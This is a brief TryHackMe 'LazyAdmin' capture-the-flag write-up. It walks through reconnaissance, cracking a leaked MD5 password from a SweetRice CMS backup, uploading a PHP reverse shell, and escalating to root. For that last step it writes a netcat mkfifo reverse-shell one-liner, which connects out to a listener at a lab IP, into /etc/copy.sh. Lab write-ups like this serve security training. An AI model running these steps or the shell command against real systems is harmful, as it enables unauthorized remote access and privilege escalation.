TryHackMe | LazyAdmin

Run nmap

Apache server on port 80. Walk the website.

Nothing in the usual spaces -robots.txt, etc.

Run directory scanning

Let’s check out content.

“SweetRice” shows up. Subdomains show login page

Another subdomain show directory listing

My_sql-bakup looks interesting

Download and view. I noticed some possible credentials.

Turns out this is a MD5 hash. We have a password.

Let’s log in.

We may possibly be able to upload a reverse shell. The Ads section looks promising. Copy/paste php reverse shell from Pentestmonkey.

Set up listener

Activate shell

Have a reverse shell. Upgrade the shell and search for elevated privileges.

Edit the copy.sh file use this code to create a listener for a bind shell:

echo “**rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1|nc 10.10.28.188 1234 >/tmp/f” > /etc/copy.sh**

I have to redo my shell. We can run the new backup file and get a root shell

Search for flags